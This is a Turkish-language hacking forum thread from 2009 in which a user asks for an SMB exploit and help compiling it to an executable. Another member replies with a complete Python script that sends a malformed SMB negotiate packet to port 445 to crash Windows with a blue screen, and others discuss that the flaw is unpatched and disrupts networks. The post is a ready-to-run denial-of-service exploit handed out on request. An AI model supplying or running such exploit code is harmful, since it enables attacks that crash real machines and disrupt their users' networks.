Windows SMB Remote Code Execution Vulnerabilities (MS09-001)

Tahribat.com Forumları
line

Bilişim Güvenliği
line

Windows SMB Remote Code Execution Vulnerabilities (MS09-001)

28/Ara/09 18:25 Kısayol Şikayet Özel Mesaj

Mx0TBT

Kayıt Tarihi: 13/Haziran/2007

Merhaba Karanlık Müridler

bu exploit elinde olan varsa paylaşırmı

bide bunu exe ye derlicek MüriD varsa derliyebilirmi ?

Ölümlü dünya. Yasin 38. Ayet

Alıntı yap
30/Ara/09 10:10 Kısayol Şikayet Özel Mesaj

Master

Kayıt Tarihi: 10/Nisan/2007

SMB'nin zayıflığını anlatan bir dizi konu var orada Exploit'in kodları var fakat derlenmişini kendin yapacaksın.

Konular:

http://www.onuroktay.com/?p=539

http://www.onuroktay.com/?p=535

Bilgi güçtür, düşmanını barışa zorlar.

Alıntı yap
30/Ara/09 10:24 Kısayol Şikayet Özel Mesaj

blackhammer

Kayıt Tarihi: 25/Mart/2003

-----python kodu-----
Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
-----python kodu-----

ph"nglui mglw"nafh cthulhu r"lyeh wagh"nagl fhtagn

Alıntı yap
30/Ara/09 13:15 Kısayol Şikayet Özel Mesaj

renegadealien

Kayıt Tarihi: 23/Mart/2003

Hala bununla ilgili bir yama cıkmadı sanıyorum...

Bill amca ben bilmem beyim bilir dedi :)

10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.

Alıntı yap
30/Ara/09 14:34 Kısayol Şikayet Özel Mesaj

Master

Kayıt Tarihi: 10/Nisan/2007

renegadealien bunu yazdı:
-----------------------------

Hala bununla ilgili bir yama cıkmadı sanıyorum...

Bill amca ben bilmem beyim bilir dedi :)

-----------------------------

Doğru sanıyorsun Rene çünkü çıkmadı.. SMB'nin kabuğundan kaynaklanan bir aksaklık söz konusu.. MS bunu yamalasa da uzun zaman alacak.. Windows 7'nin bilinen en büyük zaafı şimdilik bu... Bu'da Windows 7'nin değil tüm Kernel'in zaafı..

Bilgi güçtür, düşmanını barışa zorlar.

Alıntı yap
30/Ara/09 15:03 Kısayol Şikayet Özel Mesaj

renegadealien

Kayıt Tarihi: 23/Mart/2003

Cokta büyük bir sıkıntı değil aslında, en fazla windows kitleniyor :)

10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.

Alıntı yap
30/Ara/09 15:34 Kısayol Şikayet Özel Mesaj

Master

Kayıt Tarihi: 10/Nisan/2007

yok hocam çökebiliyor.. Portlarda sıkıntılar oluyor, Yazıcılar veya Network'te var olanlar paylaşımlarda sıkıntı yaşıyor.. Oooo bi sürü sıkıntı...

Tek güzel yanı bu ZAFFİYATI Herkesin kullanamaması.. Profesyoneller kullanıyor. :)

Bilgi güçtür, düşmanını barışa zorlar.

Alıntı yap
30/Ara/09 16:43 Kısayol Şikayet Özel Mesaj

Mx0TBT

Kayıt Tarihi: 13/Haziran/2007

tamam muridler saolun

Ölümlü dünya. Yasin 38. Ayet

Alıntı yap

Toplam Hit: 13170 Toplam Mesaj: 8

Cevapla